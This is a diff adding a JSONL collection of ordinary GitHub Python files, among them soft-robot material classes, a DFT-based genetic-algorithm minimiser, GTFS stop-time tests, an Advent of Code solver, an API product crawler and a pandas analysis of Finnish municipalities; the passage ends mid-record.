diff --git "a/138.jsonl" "b/138.jsonl" new file mode 100644--- /dev/null +++ "b/138.jsonl" @@ -0,0 +1,572 @@ +{"seq_id":"8035235604","text":"## Classes used by functions\n\n# Imports\nimport time\n\nfrom evolve_soft_2d import utility\nfrom evolve_soft_2d.unit import inspect, rep_grid\nfrom evolve_soft_2d.file_paths import create_fp_file\n\n################################################################################\n\nclass ogd_mat:\n \"\"\"Ogden material model\n \"\"\"\n\n def __init__(\n self,\n name: str,\n mu: list,\n alpha: list,\n ) -> None:\n \"\"\"Material parameters\n\n Parameters\n ----------\n name : str\n The name of the material\n mu : list\n The mu parameters\n alpha : list\n The exponent parameters\n \"\"\"\n\n self.name = name\n self.mu = mu\n self.alpha = alpha\n\n def __repr__(self) -> str:\n \"\"\"Format a representation of the material model\n\n Returns\n -------\n str\n Formatted representation of the Ogden material class for the log\n \"\"\"\n\n r = \"Name: {}\\n\".format(self.name)\n r += \"Mu: {}\\n\".format(self.mu)\n r += \"Alpha: {}\".format(self.alpha)\n return r\n\n################################################################################\n\nclass template:\n \"\"\"Unit template parameters\n \"\"\" \n \n def __init__(\n self, \n case: int,\n x_e: int,\n y_e: int,\n e_s: float,\n b: int,\n ogd_mat: ogd_mat,\n n_steps: int,\n tab_nam: str,\n d_mag: float,\n p_mag: float,\n run_success: bool = False,\n c_e: list = [0, 0, 0],\n i_e: list = [0, 0, 0],\n ) -> None:\n \"\"\"Unit template parameters\n\n Parameters\n ----------\n case : int\n The unit template case identifier\n x_e : int\n The number of elements in the x-direction\n y_e : int\n The number of elements in the y-direction\n e_s : float\n The element size in mm\n b : int\n The number of elements in the boundary of the unit\n ogd_mat : ogd_mat\n The Ogden material model\n n_steps : int\n The number of steps in the second of the simulation\n tab_nam : str\n The name of the table containing the function of the load to be applied\n d_mag : float\n The magnitude of the applied displacement in mm\n p_mag : float\n The magnitude of the applied internal pressure in MPa\n run_success : bool, optional\n The success of the unit template's run, by default False\n c_e : list, optional\n The constraint energy of the unit template, by default [0, 0, 0]\n i_e : list, optional\n The internal energy of the unit template, by default [0, 0, 0]\n \"\"\"\n\n self.case = case\n\n if x_e % 2 == 0:\n self.x_e = x_e + 1\n else:\n self.x_e = x_e\n\n if y_e % 2 == 0:\n self.y_e = y_e + 1\n else:\n self.y_e = y_e \n\n self.e_s = e_s\n self.b = b\n self.ogd_mat = ogd_mat\n self.n_steps = n_steps\n self.tab_nam = tab_nam\n self.d_mag = d_mag\n self.p_mag = p_mag\n self.run_success = run_success\n self.c_e = c_e\n self.i_e = i_e\n\n self.x_s = self.e_s*self.x_e\n self.y_s = self.e_s*self.y_e\n\n # The number of nodes in the x-direction\n self.x_n = self.x_e + 1\n # The number of nodes in the y-direction\n self.y_n = self.y_e + 1\n # The total number of elements\n self.n_e = self.x_e * self.y_e\n # The total number of nodes\n self.n_n = self.x_n * self.y_n\n # The list of internal elements\n self.e_internal = inspect.find_e_internal(self.x_e, self.y_e, self.b)\n # The list of external nodes\n self.n_external = inspect.find_n_external(self.x_n, self.y_n)\n\n # The total number of elements as a string label\n self.n_e_l = utility.list_to_str([self.x_e, self.y_e], \"x\")\n # The size of the grid as a string label\n self.s_l = 
utility.list_to_str([self.x_s, self.y_s], \"x\")\n\n # The template ID\n self.t_id = str(self.case) + \"_\" + self.n_e_l + \"_\" + self.s_l + \"_\" + str(self.b)\n\n # The representative grid of ones\n self.grid = rep_grid.create_grid(self.x_e, self.y_e, 1)\n\n # The file path of the template file\n self.fp_t_mud = create_fp_file(self, \".mud\", \"t\")\n # The file path of the template file log\n self.fp_t_log = create_fp_file(self, \"_job_1.log\", \"t\")\n # The file path of the unit t16 file\n self.fp_t_t16 = create_fp_file(self, \"_job_1.t16\", \"t\")\n # The file path of the template file log\n self.fp_t_l = create_fp_file(self, \".log\", \"t\")\n\n def __repr__(self) -> str:\n \"\"\"Format a representation of the template for the log\n\n Returns\n -------\n str\n Formatted representation of the template class for the log\n \"\"\"\n\n r = \"Case: {}\\nParameters:\\n\".format(self.case)\n r += \"Dimensions: {} elements\\n\".format(self.n_e_l)\n r += \"Size: {} mm\\n\".format(self.s_l)\n r += \"Boundary thickness: {} elements\\n\".format(self.b)\n r += \"Internal element IDs: {}\\n\".format(self.e_internal)\n r += \"Applied displacement: {} mm\\n\".format(self.d_mag)\n r += \"Applied pressure: {} MPa\\n\".format(self.p_mag)\n r += \"Analysis steps: {}\\n\".format(self.n_steps)\n r += \"Run successful: {}\\n\".format(self.run_success)\n r += \"Constraint energy:\\nX : {} J\\nY : {} J\\nMagnitude: {} J\\n\".format(self.c_e[0], self.c_e[1], self.c_e[2])\n r += \"Internal energy:\\nX : {} J\\nY : {} J\\nMagnitude: {} J\\n\".format(self.i_e[0], self.i_e[1], self.i_e[2])\n r += \"\\nOgden material parameters:\\n{}\\n\".format(self.ogd_mat)\n r += \"\\nTime created: {}\".format(time.ctime())\n return r\n\n################################################################################\n\nclass unit_p:\n \"\"\"Unit parameters\n \"\"\" \n\n def __init__(\n self,\n template: template,\n rem: list,\n grid: list,\n ls = None,\n cp = None,\n run_success: bool = False,\n c_e: list = [0, 0, 0],\n i_e: list = [0, 0, 0],\n d: list = [],\n ) -> None:\n \"\"\"The unit parameters\n\n Parameters\n ----------\n template : template\n The unit template parameters\n rem : list\n The list of elements removed from the unit\n grid : list\n The representative grid with the elements removed\n ls : lsystem, optional\n The L-System, by default None\n cp : cppn_i, optional\n The CPPN model, by default None\n run_success : bool, optional\n The success of the unit's run, by default False\n c_e : list, optional\n The constraint energy of the unit template, by default [0, 0, 0]\n i_e : list, optional\n The internal energy of the unit template, by default [0, 0, 0]\n d : list, optional\n [description], by default []\n \"\"\"\n\n self.template = template\n self.rem = rem\n self.grid = grid\n self.ls = ls\n self.cp = cp\n self.run_success = run_success\n self.c_e = c_e\n self.i_e = i_e\n self.d = d\n\n # The list of elements removed from the unit as a string\n self.rem_l = utility.list_to_str(rem, \"_\")\n\n # Generate the unique unit ID according to the method of unit generation\n if self.ls != None:\n\n self.u_id = str(len(self.rem)) + \"_\" + utility.gen_hash(utility.list_to_str(self.ls.gramm, \"_\"))\n\n elif self.cp != None:\n\n self.u_id = str(len(self.rem)) + \"_\" + str(self.cp.mod_id) + \"_\" + str(self.cp.cppn.seed) + \"_\" + str(self.cp.cppn.scale) + \"_\" + str(self.cp.cppn.hl_n) + \"_\" + str(self.cp.cppn.hl_s) + \"_\" + str(self.cp.cppn.thresh)\n\n else:\n \n self.u_id = str(len(self.rem)) + \"_\" + 
utility.gen_hash(self.rem_l)\n\n # The representative grid with the elements removed as a string label\n self.grid_l = self.format_grid()\n\n # The file path of the unit file\n self.fp_u_mud = create_fp_file(self.template, \".mud\", \"u\", self)\n # The file path of the unit log file\n self.fp_u_log = self.create_fp_list(\"log\")\n # The file path of the unit t16 file\n self.fp_u_t16 = self.create_fp_list(\"t16\")\n # The file path of the unit file log\n self.fp_u_l = create_fp_file(self.template, \".log\", \"u\", self)\n \n def __repr__(self) -> str:\n \"\"\"Format a representation of the unit\n\n Returns\n -------\n str\n Formatted representation of the unit class for the log\n \"\"\" \n r = \"Unit: {}\\n\".format(self.u_id)\n r += \"Removed elements: {}\\n\".format(self.rem)\n\n if self.ls != None:\n\n r += \"{}\\n\".format(self.ls)\n\n elif self.cp != None:\n\n r += \"{}\\n\".format(self.cp)\n\n r += \"Representative grid:\\n{}\\n\".format(self.grid_l)\n r += \"Run successful: {}\\n\".format(self.run_success)\n r += \"Constraint energy:\\nX : {} J\\nY : {} J\\nMagnitude: {} J\\n\".format(self.c_e[0], self.c_e[1], self.c_e[2])\n r += \"Internal energy:\\nX : {} J\\nY : {} J\\nMagnitude: {} J\\n\".format(self.i_e[0], self.i_e[1], self.i_e[2])\n r += \"\\nTemplate details:\\n{}\".format(self.template)\n return r\n\n def format_grid(self) -> str:\n \"\"\"Function to format the representative grid for the log\n\n Returns\n -------\n str\n The representative grid of the unit as a string\n \"\"\"\n \n grid_l = rep_grid.create_grid(self.template.x_e, self.template.y_e, 1)\n\n for i in range(0, len(self.grid)):\n grid_l[i] = \" \".join(map(str, self.grid[i]))\n \n grid_l = \"\\n\".join(map(str, grid_l))\n \n return grid_l\n\n def create_fp_list(\n self,\n ext: str,\n ) -> list:\n \"\"\"Create a list of unit file paths\n\n Parameters\n ----------\n ext : str\n The extension to add to the file path\n\n Returns\n -------\n list\n The list of file paths\n \"\"\" \n\n fp_list = []\n\n for i in range(1, 4):\n\n fp_list.append(create_fp_file(self.template, \"_job_{}.{}\".format(i, ext), \"u\", self))\n\n return fp_list\n\n################################################################################\n\n# Example material models\n\nmold_star_15 = ogd_mat(\"Mold Star 15\", [-6.50266e-06, 0.216863, 0.00137158], [-21.322, 1.1797, 4.88396])\n\necoflex_0030 = ogd_mat(\"Ecoflex 0030\", [-0.0142909, -3.64558e-06, 9.59447e-08], [-5.22444, -0.162804, 11.3772])\n\nsmooth_sil_950 = ogd_mat(\"Smooth Sil 950\", [-0.30622, 0.0283304, 6.5963e-09], [-3.0594, 4.59654, 17.6852])","repo_name":"NaudeConradie/evolve_soft_2d","sub_path":"evolve_soft_2d/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":11137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31839723562","text":"import sqlalchemy as sa\n\nfrom utils.request_schema import CitizenImport\nfrom db.models import relative_table\n\n\ndef citizen_record_obj_to_dict(conn, import_id, citizen_rec):\n d = dict(citizen_rec)\n d['gender'] = d['gender'].value\n d['birth_date'] = d['birth_date'].strftime('%d.%m.%Y')\n d['relatives'] = get_relatives_list(conn, import_id, citizen_rec.citizen_id)\n del d['id']\n del d['import_id']\n return d\n\n\ndef get_relatives_list(conn, import_id, citizen_id):\n s = sa.select(\n [relative_table.c.citizen_id, relative_table.c.relative_id]\n ).where(\n sa.and_(\n relative_table.c.import_id == import_id,\n sa.or_(\n relative_table.c.citizen_id == 
citizen_id,\n relative_table.c.relative_id == citizen_id\n )\n )\n )\n rows = conn.execute(s)\n results = []\n for r in rows:\n if r.citizen_id != citizen_id:\n results.append(r.citizen_id)\n else:\n results.append(r.relative_id)\n return results\n","repo_name":"kholmatov/citizens","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31222559551","text":"'''\nBirmingham Parallel Genetic Algorithm\n\nA pool genetic algorithm for the\nstructural characterisation of \nnanoalloys.\n\nPlease cite - \nA. Shayeghi et al, PCCP, 2015, 17, 2104-2112\n\nAuthors -\nThe Johnston Group\n\n20/3/15\n\n--- Random Structure Minimiser Class ---\n\n'''\n\nimport sys, os\nimport random as ran\nimport Database as db\n\nfrom fixOverlap import fixOverlap\nfrom DFT_input import vasp_input as DFTin\nfrom DFT_output import vasp_output as DFTout\nfrom checkPool import checkPool as checkPool\nfrom CoM import CoM \nfrom Explode import checkClus\n\nfrom SurfOpt import SurfOpt \nfrom surfacePOSCAR import surfacePOSCAR \n\nclass minRan:\n\n\tdef __init__(self\n\t\t\t\t,natoms,r_ij\n\t\t\t\t,eleNums,eleNames\n\t\t\t\t,eleMasses,nPool\n\t\t\t\t,stride,subString\n\t\t\t\t,boxAdd,surface\n\t\t\t\t,surfGA):\n\n\t\tself.natoms = natoms\n\t\tself.r_ij = r_ij\n\t\tself.eleNums = eleNums\n\t\tself.eleNames = eleNames\n\t\tself.eleMasses = eleMasses\n\t\tself.nPool = nPool\n\t\tself.stride = stride\n\t\tself.subString = subString\n\t\tself.boxAdd = boxAdd\n\n\t\t'''\n\t\tSurface Object.\n\t\t'''\n\n\t\tself.surface = surface\n\t\tself.surfGA = surfGA\n\n\t\tdb.lock()\n\n\t\tself.calcNum = db.findLastDir() + 1 \n\t\tos.system(\"mkdir \" + str(self.calcNum))\n\n\t\tdb.unlock()\n\n\t\tself.genRan()\n\n\tdef genRan(self): \n\n\t\tclus = []\n\t\tscale=self.natoms**(1./3.)\n\n\t\tfor i in range(len(self.eleNames)):\n\t\t\tfor j in range(self.eleNums[i]):\n\n\t\t\t\tele = self.eleNames[i]\n\n\t\t\t\tx = ran.uniform(0,1)*self.r_ij*scale\n\t\t\t\ty = ran.uniform(0,1)*self.r_ij*scale\n\t\t\t\tz = ran.uniform(0,1)*self.r_ij*scale\n\n\t\t\t\tatom = [ele,x,y,z]\n\n\t\t\t\tclus.append(atom)\n\n\t\tclus = fixOverlap(clus)\n\n\t\tif self.surfGA:\n\n\t\t\t'''\n\t\t\tWrite Surface POSCAR.\n\t\t\t'''\n\n\t\t\tSurfaceStruc = SurfOpt(clus,self.surface,self.eleNames,self.eleMasses)\n\t\t\tsurfClus = SurfaceStruc.placeClus()\n\n\t\t\tself.vaspIN = surfacePOSCAR(self.calcNum,self.eleNames,surfClus,self.surface)\n\n\t\telse: \n\n\t\t\t'''\n\t\t\tWrite gas-phase POSCAR.\n\t\t\t'''\n\t\n\t\t\tself.vaspIN = DFTin(self.calcNum,clus,self.eleNames\n\t\t\t\t\t\t\t\t,self.eleMasses,self.eleNums\n\t\t\t\t\t\t\t\t,self.boxAdd)\n\n\n\t\tself.minimise()\n\n\n\tdef minimise(self):\n\n\t\t'''\n\t\tStart \n\t\tDFT calculation.\n\t\t'''\n\n\t\tif self.doDFT() == 0:\n\n\t\t\toutput = DFTout(self.calcNum,self.natoms)\n\n\t\t\tif output.checkError():\n\t\t\t\tself.genRan()\n\t\t\telse:\n\t\t\t\tself.finalEnergy = output.getEnergy()\n\t\t\t\tself.finalCoords = output.getCoords()\n\n\t\t\t\tcheck = checkClus(self.natoms,self.finalCoords)\n\n\t\t\t\tif check.exploded() == False:\n\t\t\t\t\tself.decide()\n\t\t\t\telse:\n\t\t\t\t\tself.genRan()\n\n\t\telse:\n\n\t\t\tself.genRan()\n\n\tdef doDFT(self):\n\n\t\t'''\n\t\tChange directory and \n\t\tsubmit calculation.\n\t\t'''\n\n\t\tbase = os.environ[\"PWD\"]\n\t\tos.chdir(base+\"/\"+str(self.calcNum))\n\n\t\texitcode = os.system(self.subString)\n\n\t\twith 
open(base+\"/exitcodes.dat\",\"a\") as exit:\n\t\t\texit.write(str(self.calcNum))\n\t\t\texit.write(\" Exitcode = \"+str(exitcode)+\"\\n\")\n\t\t\t\n\t\tos.chdir(base)\n\n\t\treturn exitcode\n\n\tdef decide(self):\n\n\t\t'''\n\t\tShould cluster be added to pool.dat?\n\t\t'''\n\n\t\tif os.path.exists(\"pool.dat\"):\n\t\t\twith open(\"pool.dat\",\"r\") as pool:\n\t\t\t\tpoolList = pool.readlines()\n\t\t\t\tpoolSize = len(poolList) / (self.natoms + 2)\n\t\t\t\tif poolSize < self.nPool:\n\t\t\t\t\tself.addToPool()\n\t\t\t\telse:\n\t\t\t\t\tAcceptReject = checkPool()\n\t\t\t\t\tAccept = AcceptReject.checkEnergy(float(self.finalEnergy))\n\n\t\t\t\t\tif Accept:\n\t\t\t\t\t\tIndex = AcceptReject.lowestIndex\n\t\t\t\t\t\tIndex = (Index*self.stride)+1\n\n\t\t\t\t\t\tdb.updatePool(\"Finish\"\n\t\t\t\t\t\t\t\t\t,Index,self.eleNums\n\t\t\t\t\t\t\t\t\t,self.eleNames,self.eleMasses\n\t\t\t\t\t\t\t\t\t,self.finalEnergy,self.finalCoords\n\t\t\t\t\t\t\t\t\t,self.stride,self.vaspIN.box)\n\t\telse:\n\t\t\tself.addToPool()\n\n\n\tdef addToPool(self):\n\n\t\t'''\n\t\tAdd Final Geometry and \n\t\tenergy to pool.dat.\n\t\t'''\n\n\t\tclus = []\n\n\t\toutput = DFTout(self.calcNum,self.natoms)\n\t\tself.finalEnergy = output.getEnergy()\n\t\tself.finalCoords = output.getCoords()\n\n\t\tdb.lock()\n\n\t\twith open(\"pool.dat\",\"a\") as pool:\n\n\t\t\tpool.write(str(self.natoms)+\"\\n\")\n\t\t\tpool.write(\"Energy = \"+str(self.finalEnergy))\n\t\t\tpool.write(\" Dir = \"+str(self.calcNum)+\"\\n\")\n\n\t\t\t'''\n\t\t\tMove coordinates from \n\t\t\tcentre of the simulation cell.\n\t\t\t'''\n\n\t\t\tbox = self.vaspIN.box\n\t\t\tself.finalCoords = [float(i) - box/2 for i in self.finalCoords]\n\n\t\t\t'''\n\t\t\tChange format of \n\t\t\tthe coordinates.\n\t\t\t'''\n\n\t\t\tfor i in range(0,self.natoms*3,3):\n\n\t\t\t\tx = self.finalCoords[i]\n\t\t\t\ty = self.finalCoords[i+1]\n\t\t\t\tz = self.finalCoords[i+2]\n\n\t\t\t\tclus.append([x,y,z])\n\n\t\t\t'''\n\t\t\tAdd the element types\n\t\t\tand write to pool file.\n\t\t\t'''\n\n\t\t\tcount = 0\n\n\t\t\tfor i in range(len(self.eleNames)):\n\t\t\t\tfor j in range(self.eleNums[i]):\n\t\t\t\t\tele = self.eleNames[i]\n\t\t\t\t\tx,y,z = clus[count]\n\t\t\t\t\tatom = ele+\" \"+str(x)+\" \"+str(y)+\" \"+str(z)+\"\\n\"\n\t\t\t\t\tpool.write(atom)\n\t\t\t\t\tcount += 1\n\n\t\tdb.unlock()\n\n","repo_name":"jbadavis/bpga","sub_path":"GA/MinimiseRan.py","file_name":"MinimiseRan.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"2760691673","text":"from shape import Shape\n\nclass Triangle (Shape):\n tcounter = 0\n def __init__(self , c1 , c2 , c3 , color):\n self.c1 = c1\n self.c2 = c2\n self.c3 = c3\n Triangle.tcounter += 1\n super().__init__(\"triangle \" + str(Triangle.tcounter) , color , 3 )\n\n","repo_name":"mahtabfarrokh/python-course-summer-2017","sub_path":"third/triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21446039612","text":"import enum\n\nINVALID_TYPE_EXCEPTION = \"Invalid data type given\"\nINVALID_CHAR_EXCEPTION = \"Invalid character given\"\n\nBASEMENT_NOT_FOUND = -1\n\n\n# Expected Character enum\nclass Directions(enum.Enum):\n UP = \"(\"\n DOWN = \")\"\n\n\nclass AoC2015Day1Exception(Exception):\n def __init__(self, value):\n self.value = value\n\n def __str__(self):\n return repr(self.value)\n\n\nclass Day1:\n def 
__init__(self):\n self._floor = 0\n self._basement_interation_index = BASEMENT_NOT_FOUND\n\n def reset(self):\n self._floor = 0\n self._basement_interation_index = BASEMENT_NOT_FOUND\n\n def calc_floor(self, input_string):\n # Checking for invalid input types\n if type(input_string) != str:\n raise AoC2015Day1Exception(\"%s: %s\" % (INVALID_TYPE_EXCEPTION, type(input_string)))\n\n loop_count = 0\n\n for character in input_string:\n if character != Directions.UP.value and character != Directions.DOWN.value:\n raise AoC2015Day1Exception(\"%s: %s\" % (INVALID_CHAR_EXCEPTION, character))\n\n if character == Directions.UP.value:\n self._floor += 1\n elif character == Directions.DOWN.value:\n self._floor -= 1\n\n # Setting basement interation only if it not already found\n if self._floor < 0 and self._basement_interation_index == BASEMENT_NOT_FOUND:\n self._basement_interation_index = loop_count\n\n loop_count += 1\n\n def get_floor(self):\n return self._floor\n\n def get_basement_interation(self):\n # Adjusting for indexing to be 1 indexed instead of 0 indexed\n return self._basement_interation_index + 1\n\n\nif __name__ == \"__main__\":\n\n day1_file_path = \"../../test/input_data/2015/day1_input.txt\"\n\n with open(day1_file_path, \"r\") as input_file:\n input_data = input_file.read()\n\n day1 = Day1()\n\n day1.calc_floor(input_data)\n\n print(\"--- Day 1: Not Quite Lisp ---\")\n print(\"Part A Final floor: %d\" % day1.get_floor())\n print(\"Part B Iterations until basement entered: %d\" % day1.get_basement_interation())\n","repo_name":"ConanSherlock/CodingExercises","sub_path":"python/2015/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"202493685","text":"\"\"\"\ntest_stop_time.py: tests for realtime_gtfs/stop_time.py\n\"\"\"\n\nimport pytest\n\nfrom realtime_gtfs.models import StopTime\nfrom realtime_gtfs.exceptions import MissingKeyError, InvalidKeyError, InvalidValueError\n\nMINIMAL_STOP_TIME_DICT = {\n \"trip_id\": \"123\",\n \"arrival_time\": \"01:23:45\",\n \"stop_id\": \"123\",\n \"stop_sequence\": \"5\"\n}\n\nFULL_STOP_TIME_DICT = {\n \"trip_id\": \"123\",\n \"arrival_time\": \"1:23:45\",\n \"departure_time\": \"25:23:45\",\n \"stop_id\": \"123\",\n \"stop_sequence\": \"5\",\n \"stop_headsign\": \"I'm a sign\",\n \"pickup_type\": \"3\",\n \"drop_off_type\": \"2\",\n \"shape_dist_traveled\": \"5.25\",\n \"timepoint\": \"0\"\n}\n\nMINIMAL_STOP_TIME = StopTime.from_dict(MINIMAL_STOP_TIME_DICT)\nFULL_STOP_TIME = StopTime.from_dict(FULL_STOP_TIME_DICT)\n\ndef test_stop_time_happyflow_minimal():\n \"\"\"\n test_stop_time_happyflow_minimal: minimal, correct example\n \"\"\"\n stop_time = StopTime.from_gtfs(MINIMAL_STOP_TIME_DICT.keys(), MINIMAL_STOP_TIME_DICT.values())\n assert stop_time == MINIMAL_STOP_TIME\n\ndef test_stop_time_happyflow_full():\n \"\"\"\n test_stop_time_happyflow_full: full, correct example\n \"\"\"\n stop_time = StopTime.from_gtfs(FULL_STOP_TIME_DICT.keys(), FULL_STOP_TIME_DICT.values())\n assert stop_time == FULL_STOP_TIME\n\ndef test_missing_key():\n \"\"\"\n test_missing_key: check if it errors if a required key is missing\n \"\"\"\n temp_dict = FULL_STOP_TIME_DICT.copy()\n del temp_dict[\"trip_id\"]\n with pytest.raises(MissingKeyError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = FULL_STOP_TIME_DICT.copy()\n del temp_dict[\"departure_time\"]\n del temp_dict[\"arrival_time\"]\n with 
pytest.raises(MissingKeyError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = FULL_STOP_TIME_DICT.copy()\n del temp_dict[\"stop_id\"]\n with pytest.raises(MissingKeyError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = FULL_STOP_TIME_DICT.copy()\n del temp_dict[\"stop_sequence\"]\n with pytest.raises(MissingKeyError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n\ndef test_invalid_values():\n \"\"\"\n test_invalid_values: test for values out of range, invalid enums, ...\n \"\"\"\n # TODO: test times\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"stop_sequence\"] = \"-1\"\n with pytest.raises(InvalidValueError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"pickup_type\"] = \"-1\"\n with pytest.raises(InvalidValueError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"pickup_type\"] = \"4\"\n with pytest.raises(InvalidValueError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"drop_off_type\"] = \"-1\"\n with pytest.raises(InvalidValueError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"drop_off_type\"] = \"4\"\n with pytest.raises(InvalidValueError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"shape_dist_traveled\"] = \"-1\"\n with pytest.raises(InvalidValueError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"timepoint\"] = \"-1\"\n with pytest.raises(InvalidValueError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"timepoint\"] = \"2\"\n with pytest.raises(InvalidValueError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n\ndef test_default():\n \"\"\"\n test_default: check for correct default values (wheelchair_boarding and location_type)\n \"\"\"\n assert MINIMAL_STOP_TIME.pickup_type == 0\n assert MINIMAL_STOP_TIME.drop_off_type == 0\n assert MINIMAL_STOP_TIME.timepoint == 1\n\ndef test_invalid_key():\n \"\"\"\n test_invalid_key: test if it errors if an invalid key is passed\n \"\"\"\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"stop_time_favorite_food\"] = \"Pizza\"\n with pytest.raises(InvalidKeyError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\ndef test_representation():\n \"\"\"\n test_representation: check if __str__ and __repr__ are defined\n \"\"\"\n assert str(MINIMAL_STOP_TIME) != \"\"\n assert repr(MINIMAL_STOP_TIME) != \"\"\n\ndef test_empty_value():\n \"\"\"\n test_empty_value: test if it doesn't overwrite values with empty string\n \"\"\"\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"stop_id\"] = \"\"\n with pytest.raises(MissingKeyError):\n StopTime.from_gtfs(temp_dict.keys(), temp_dict.values())\n\n# pylint: disable=comparison-with-itself\ndef test_equal():\n \"\"\"\n test_equal: check if __eq__ functions\n \"\"\"\n assert MINIMAL_STOP_TIME == MINIMAL_STOP_TIME\n assert MINIMAL_STOP_TIME != FULL_STOP_TIME\n assert FULL_STOP_TIME != MINIMAL_STOP_TIME\n assert FULL_STOP_TIME == FULL_STOP_TIME\n assert MINIMAL_STOP_TIME != \"MINIMAL_STOP_TIME\"\n\n temp_dict = MINIMAL_STOP_TIME_DICT.copy()\n temp_dict[\"drop_off_type\"] = 
\"1\"\n temp_stop_time = StopTime.from_dict(temp_dict)\n\n assert temp_stop_time != MINIMAL_STOP_TIME\n","repo_name":"Robbe7730/realtime-gtfs","sub_path":"tests/test_stop_time.py","file_name":"test_stop_time.py","file_ext":"py","file_size_in_byte":5431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73529601427","text":"import http.client, urllib.request, urllib.parse, urllib.error, base64\nimport json\nimport pandas as pd\nimport os\n\ndata_path = \"YOUR_PATH\"\ndata = pd.read_csv(os.path.join(data_path+ \"Junction_data_sample.csv\"), sep=\";\")\n\n# because of a (suspected) API bug, the info of all products is not fetchable.\n# Querying for specific values seems to check for the urlSlug,\n# because of this we fetch info on any product which has its ean in the urlSlug as a hack-around the 100 limit.\n# This leads to a drastic reduction in data we can obtain, but is good enough for now.\n\nunique_ena = data.EAN.unique()\n\nheaders = {\n # Request headers\n 'Content-Type': 'application/json',\n 'Ocp-Apim-Subscription-Key': 'YOUR_KEY',\n}\n\nparams = urllib.parse.urlencode({\n\n})\nall_eans = []\nfor ean in unique_ena:\n\n body = {\"query\": \"%s\"%ean}\n\n # body = {\"filters\": {\n # \"ean\": unique_ena\n # }}\n json_data = json.dumps(body)\n\n try:\n conn = http.client.HTTPSConnection('kesko.azure-api.net')\n conn.request(\"POST\", \"/v1/search/products?%s\" % params, \"%s\" % json_data, headers)\n response = conn.getresponse()\n data = response.read()\n print(data)\n conn.close()\n\n df = pd.read_json(data)\n results = df.results.to_json()\n test = pd.read_json(results).T\n\n print(test.head())\n print(len(test))\n all_eans.append(test)\n\n except Exception as e:\n print(\"[Errno {0}] {1}\".format(e.errno, e.strerror))\n\nbig_df = pd.concat(all_eans)\nbig_df.to_csv(data_path+\"product_info.csv\", index=False)\nprint(len(big_df))\n\nprint(\"Done\")\n","repo_name":"clara2911/junction2019_sustainability","sub_path":"apis/search_api/product_search_data_crawler.py","file_name":"product_search_data_crawler.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23707105666","text":"import pandas as pd\n\ndf = pd.read_csv('https://student.labranet.jamk.fi/~varpe/datananal2k2020/kerta3/kunnat.txt', sep = ';', decimal=',')\n\nprint(\"a) Seutukuntien pinta-alat:\")\ndf1 = pd.DataFrame(df['maapinta-ala'].groupby(df['seutukunta']).sum())\nprint(df1.sort_values('maapinta-ala', ascending=False).head(5))\n\nprint(\"b) maakuntien kaupungistuminen:\")\ndf['kaupunkilaiset'] = 0\ndf.loc[(df['kuntamuoto'] == \"Kaupunki\"), 'kaupunkilaiset'] = df['Väkiluku']\n\nkaupunkilaiset = pd.DataFrame((df['kaupunkilaiset'].groupby(df['maakunta']).sum()) / (df['Väkiluku'].groupby(df['maakunta']).sum()) * 100)\nkaupunkilaiset['kaupungistuminen%'] = kaupunkilaiset.iloc[:, 0]\nprint(kaupunkilaiset.sort_values(['kaupungistuminen%'], ascending=False).head(5))\n\nprint(\"c) Ruotsinkielisten osuus maakunnittain\")\ndf['ruottalaiset'] = df['Ruotsinkielisten osuus%'] * df['Väkiluku'] / 100\nruottalaiset = pd.DataFrame((df['ruottalaiset'].groupby(df['maakunta']).sum()) / (df['Väkiluku'].groupby(df['maakunta']).sum()) * 100) \nruottalaiset['ruottalaiset%'] = ruottalaiset.iloc[:, 0]\nprint(ruottalaiset.sort_values('ruottalaiset%', 
